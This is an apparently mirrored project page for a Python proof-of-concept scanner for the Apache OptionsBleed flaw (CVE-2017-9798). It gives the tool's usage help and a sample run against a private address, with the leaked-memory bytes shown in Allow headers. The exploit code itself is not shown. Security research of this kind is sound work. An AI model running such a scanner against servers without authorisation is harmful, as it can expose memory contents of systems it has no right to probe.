python>> OptionsBleed-POC-Scanner>> 返回
项目作者: brokensound77

项目描述 :
OptionsBleed (CVE-2017-9798) PoC / Scanner
高级语言: Python
项目地址: git://github.com/brokensound77/OptionsBleed-POC-Scanner.git
创建时间: 2017-09-27T03:28:22Z
项目社区:https://github.com/brokensound77/OptionsBleed-POC-Scanner
开源协议:MIT License
下载


OptionsBleed-POC-Scanner

OptionsBleed (CVE-2017-9798) PoC / Scanner

More information coming soon…

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Usage

pip install -r requirements.txt

  1. usage: bleeder.py [-h] [-c COUNT] [-f {option,custom}] [-tc THREAD_COUNT] [-nv] [-ni] [-v] [-e] url
  3. positional arguments:
  4.   url                   full URL (including http(s)) to be scanned
  6. optional arguments:
  7.   -h, --help            show this help message and exit
  8.   -c COUNT, --count COUNT
  9.                         number of times to scan (default: 1000)
  10.   -f {option,custom}, --force {option,custom}
  11.                         forces the scan to attempt using custom verb method
  12.                         OR OPTIONS (default: try OPTIONS THEN custom)
  13.   -tc THREAD_COUNT, --thread-count THREAD_COUNT
  14.                         max concurrent thread count (default: 500)
  15.   -nv, --no-verify      does not verify ssl connection (may be necessary for
  16.                         self-signed certs)
  17.   -ni, --no-ignore      does NOT ignore ssl warnings (default: ignored)
  18.   -v, --verbose         prints all headers
  19.   -e, --errors          prints all errors

Simple Usage

  1. python bleeder.py "http://10.1.2.3" -c 50
  3.         ::OptionsBleed (CVE-2017-9798) Scanner::
  5. [+] scanning http://10.1.2.3 to see if it bleeds!
  6. [+] checking OPTION method
  7. [+] allow headers detected in OPTION response
  8. [+] checking CUSTOM method
  9. [+] allow headers detected in CUSTOM response
  10. [+] scanning with OPTIONS method...
  11. [+] scanning with custom (PULL) method...
  12. [+] 50 responses captured
  13. [+] unique results:
  14. GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
  15. GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
  16. GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
  17. GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
  18. GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD,all,HEAD
  19. GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
  20. GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
  21. GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
  22. GET,HEAD,allow,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
  23. GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
  24. GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
  25. GET,HEAD,allow,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
  26. [+] scan complete!